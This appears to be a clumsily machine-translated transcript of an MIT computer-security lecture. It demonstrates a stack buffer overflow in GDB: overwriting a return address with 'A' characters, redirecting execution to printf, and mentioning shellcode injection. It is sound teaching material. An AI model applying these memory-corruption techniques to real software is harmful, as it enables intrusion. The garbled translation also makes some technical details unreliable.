MIT course "Computer Systems Security". Lecture 1: "Introduction: threat models", part 3
Massachusetts Institute of Technology. Lecture course # 6.858. "Security of computer systems". Nikolai Zeldovich, James Mykens. year 2014
Computer Systems Security is a course on the development and implementation of secure computer systems. Lectures cover threat models, attacks that compromise security, and security methods based on the latest scientific work. Topics include operating system (OS) security, capabilities, information flow control, language security, network protocols, hardware protection and security in web applications.
Run this program with a debugger. You will get acquainted with this in detail in the first laboratory work. And now we will try to set a breakpoint in this redirection function, run the program and see what we have done. ')
So, I started the program, it began to perform the main function, and the redirection happens rather quickly. Now the debugger is stopped at the beginning of the redirect. We can see what is happening here, for example, we can ask to show us the current CPU registers. Here we are going to look at the lower level, not the source code level C. We are going to look at these instructions executed by my machine to see what is really going on. The C language can really hide something from us, so we ask you to show us all the registers.
In 32-bit systems (x86), as you remember, there is a pointer to the stack frame - the EBP register (stack-frame Base Pointer, pointer to the stack frame). And my program, not surprisingly, also has a stack.
On x86, the stack grows down, this is such a stack, as shown on the slide, and we can continue to stuff our data into it. Currently, the stack pointer points to the specific memory location ffffd010 (the ESP register, the address of the top of the stack). There is some value here. How did it get there? One way to understand this is to parse the code for the redirection function.
The variable Convenience must have an integer value. So we can sort the function by name. Here you can see what this function does. First of all, it starts to perform some actions with the EBP register, this is not very interesting. But then it subtracts a certain value from the stack pointer. This essentially creates space for all variable parameters, such as a buffer and an integer, we saw this in the source code C. Now we want to understand the work of this function. The value of the stack pointer, which we saw earlier, is already in the middle of the stack, and above it is information about what is being done in the buffer, what is the integer value and also the return address to the main function, which is implemented in the stack. So somewhere here we must have a return address. Now we are just trying to figure out where different things are on the stack.
We can give the command to print the address of this buffer variable.
Her address is ffffd02c. Now let's display the address of the integer value i - it looks like this: ffffd0ac. Thus, the integer is located above the stack, and the buffer below.
That is, we see that our buffer is located on the stack at this place, there is an integer on top, and possibly some other things, and at the very end is the return address to the main function, which is called “redirection”.
We see that the stack grows down because there are things with higher “high” addresses above it. Inside our buffer, the elements will be as follows: [0] below, and further upwards, ascending to element [128], as I drew on the board.
Let's see what happens if we enter the same data that led to the crash of the system. But before that, we need to determine exactly where our return address is, how it relates to the ebp pointer.
In x86, there is a handy thing, called Convention, which makes the EBP pointer, or register, indicating something happening in the running stack be flagged as "saved EBP register" (saved EBP). This is a separate register, located after all variables, but before the return address, as shown in this figure.
It is stored according to several instructions above. Examine what is saved EBP.
In the GDB (GNU Debugger) debugger, you can explore some variable X, for example, the EBP pointer variable.
Here is his stack position - ffffd0b8. Indeed, it is located higher than our variable i (register edi). It is perfectly.
And it has some other value that EBP takes before the function is called, and above is another memory location, which will be the return address. If we print ebp + 4, it will show us the contents of the stack 0x08048E5F. Let's see what this indicates.
This is what you have to do in the laboratory. So you can take this address and try to parse it. What is it like and where does it end? Thus, GDB really helps to figure out which function contains this address.
What is 5f? This is what the return address indicates. As you can see, this instruction follows immediately after calling the <read_req> redirect. Therefore, when we return from the redirection, this is the place where we go and from where we continue to perform the function.
So where are we now? To summarize, we can try to disassemble our instruction pointer. Enter “disass $ eip”.
Now we are at the very beginning of the redirection. Let's try to run the get () function and enter the “next” command. And then we print our unimaginable amount, which caused the program to stop - AAA ... And, to see what happens.
So we did get (), but the program still works. Now we will find out what is happening in the memory at the moment and why everything will become bad afterwards
What do you guys think is happening now? I typed a sequence of characters A. What did the get () command do to the memory? She placed this sequence on a stack of memory, which, if you remember, contains elements from [0] to [128]. And this sequence A began to fill it from the bottom up, this is how I drew, in the direction of the arrow.
But we had only one pointer — the beginning of the address, that is, we indicated where to start in the buffer from A. But get () does not know the length of the stack, so it just continues to fill the memory with our data, redistributing them up the stack, possibly bypassing the return address and everything above our stack. So I type a command to count repeats A and get the value "180", which exceeds our value "128".
This is not so good. We can again check what is happening with our EBP index, for this I am typing $ ebp. We get the address 41414141.
Great, then I type "show the location of the return address $ ebp + 4" and get the same address 41414141.
This is not good at all. This shows what will happen if the program returns here after the redirection, that is, it jumps to the register with the address 41414141. And there is nothing there! And she will stop. That is, we got a segmentation error.
So let's just come here and see what happens. Type “next” and run the program further.
Now we are approaching the end of the function and can step over another 2 instructions. Recruit nexti again.
You can see that at the end of the function there is an “leave” instruction that restores the stack to where it was. She seems to be “pushing” the stack pointer all the time back to the return address using the same EBP, which is what she basically needs. And now the stack points to the return address we are going to use. In fact, these are all our A characters. And if we run another instruction, the processor will go to this particular address 41414141, start executing the code there and “crash” because it is an invalid address in the page table.
Let's check what happens there. Once again, we print the contents of our buffer and make sure that it is completely filled with 128 A characters.
If you remember, we have entered 180 “A” elements into the buffer. So something else happens after the buffer overflow has occurred. If you remember, we have converted A to integer i in the integer register. And if we have only alphabetic characters A, without any numbers, then 0 is written into the memory location, since the letter cannot be represented as an integer. And 0, as is known, in C language means the end of a line. Thus, GDB thinks that we have a beautiful, complete string of 128 characters A.
But it doesn’t really matter, because we still have all these A's at the top, which have already damaged the stack.
Well, that was a really important lesson. It is necessary to take into account that there is another code that will be executed after you managed to overflow the buffer and cause memory corruption. You must make sure that this code does not do anything stupid, for example, does not try to convert the letter A characters into integer values ​​i. So, it should provide that if a non-numerical value is detected, in our case it is A, we will not be able to skip to the address 41414141. Thus, in some cases you must limit the input data. Perhaps this is not very important in this case, but in other situations you need to be careful with the type of input data, that is, specify what kind of data — numeric or alphabetic — the program should handle.
Now we will see what happens next and jump again. Look at our register. Right now, EIP, a kind of instruction pointer, points to the last redirect address <read_req + 44>. If we take another step, we will finally move on to our unfortunate 41414141.
Indeed, the program follows our instructions, and if we ask GDB to print the current set of registers, then the current position indicator will be a strange value. Let's try to execute one more instruction and finally, we get a program crash.
This happened because the program attempted to follow an instruction pointer that does not correspond to a valid page for this process in the operating system's page table. It's clear?
Great, I have a question for you. So what is our problem after all?
Audience: you can do whatever you want with this program!
That's right! Although, in fact, it was rather stupid to enter such a huge number of these A. But if you knew well where to put these values, you could put other values ​​there and go to some other address. Let's see if we can do this.
Stop our program, restart it and re-enter many A characters to overflow the buffer. But I'm not going to figure out which one is on the stack. But suppose I fill the stack at this point and then try to manually change things in the stack so that the function jumps to the place I need. Therefore, I introduce again NEXTI.
Where are we? We are again at the very end of the redirection. Let's take a look at our stack.
If we examine ESP, we will see our broken pointer. Good. Where could we jump from here? What could we do interesting? Unfortunately, this program is very limited. There is nothing in her code that would help us jump and do something interesting, but we will still try. Perhaps we will be able to find the PRINTF function, jump over there and make it print some value, or an equivalent value X. We can disassemble the main function - disass main.
And the main function does a whole bunch of things — initiation, call forwarding, a lot more, and then calling PRINTF. So how about jumping to this point - <+26>, which sets the argument for PRINTF equal to% eax in register <+22>? Thus, we will be able to take the value in the register <+26> and “paste” it to this stack. This should be fairly easy to do with the debugger; you can make this set {int} esp equal to this value.
You can check ESP again, and indeed, it has that value.
We will continue with the help of the “C” command, and we will see that the function has printed out X equal to some kind of nonsense, and I think it happened because of the contents of this stack, which we tried to print. We incorrectly set up all the arguments because we jumped into the middle of this calling sequence (the sequence of commands and data needed to call this procedure).
Yes, we typed this value, and after that the system failed. Why did this happen? We jumped to the PRINTF function, and then something went wrong. We changed the return address, so when we returned from the redirection, we move to this new address, at the same point immediately after PRINTF. So where did this crash come from?
Audience: due to the return of the main function!
That's right! This is what happens - this is the point where we jumped in the register <+26>. It sets some parameters and calls PRINTF. PRINTF is operational and ready to return. So far, so good, because this call instruction "puts" the return address on the stack so that this address is used by the PRINTF function.
The main function continues to work, it is ready to run the LEAVE instruction, which is not anything interesting, and then make another “return” in the <+39> register. But the fact is that in this stack there is no correct return address. Therefore, presumably, we return to someone else who knows the location of the memory above the stack, and jump somewhere else. So, unfortunately, our pseudo-attacks do not work here. Some other code is running here. But then he "crashes." This is probably not what we wanted to do.
So if you really want to be careful, you must not only carefully place the return address on the stack, but also find out from whom the second RET will receive its return address. Then you need to try to carefully push something else onto the stack to be sure that your program “cleanly” continues to run after it has been hacked, and so that no one will notice this interference.
This is all you try to do in laboratory work number 1, only in more detail.
There is one more thing that we should think about now - about the stack architecture in case of buffer overflow. In this case, our problem is that the return address is located at the top, right? The buffer continues to grow and, eventually, overlaps the return address. But what if we turn the stack “down finished”? You know, some machines have stacks that grow upwards. So we could imagine an alternative design where the stack starts from the bottom and continues to grow up, not down. So if you overflow such a buffer, you just keep going up the stack, and in this case nothing bad happens.
Now I will draw you to explain how it looks. Let the return address is here at the bottom of the stack. Above are our variables, or saved EBP, then integer variables, and at the very top is a buffer from [0] to [128]. If we make an overflow, it goes up this arrow.
Thus, a buffer overflow will not affect the return address. What do we need to do in our program to implement this version of work? Right, make the redirect! Place a stack frame on the left that performs this redirection and redirect the function call to the top. As a result, our scheme will look like this: at the top on the stack is the return address, then the saved EBP, and all the other variables will be located on top of it. And then we start overflowing the buffer with the get (S) command.
So, the work function is still problematic. Basically, because the buffer is surrounded by return functions from all sides, and in any case you can overflow something. Suppose our machine has a stack growing upwards. Then at what point can you take control of the program?
In fact, in some cases it is even easier. You do not need to wait for the redirect to return. Perhaps there were even things like turning A into i. In fact, this is easier because the get (S) command overflows the buffer. This will change the return address, and then immediately come back and jump to where you tried to create a certain structure.
What happens if we have such a rather boring program for all sorts of experiments? It does not seem to contain an interesting code for the jump. All you can do is type here, in PRINTF, another value of X.
Let's try!
Audience: if you have an extra stack, can you put an arbitrary code that, for example, executes a program shell?
Yes, yes, yes, it is really reasonable, because then you can support other “input” values. But here there is some protection against this, you will learn about it in the next lectures. But in principle, you could have a return address here that overlaps on both types of machines — with stacks up and with stacks down. And instead of specifying it in the existing code, for example PRINTF in the main function, we could have a return address in the buffer, since this is just some location in the buffer. But you can "jump" there and consider it an executable parameter.
As part of your request, you send a few bytes of data to the server, and then get the return address or thing that you placed in this buffer location, and you will continue the execution of the program from this point.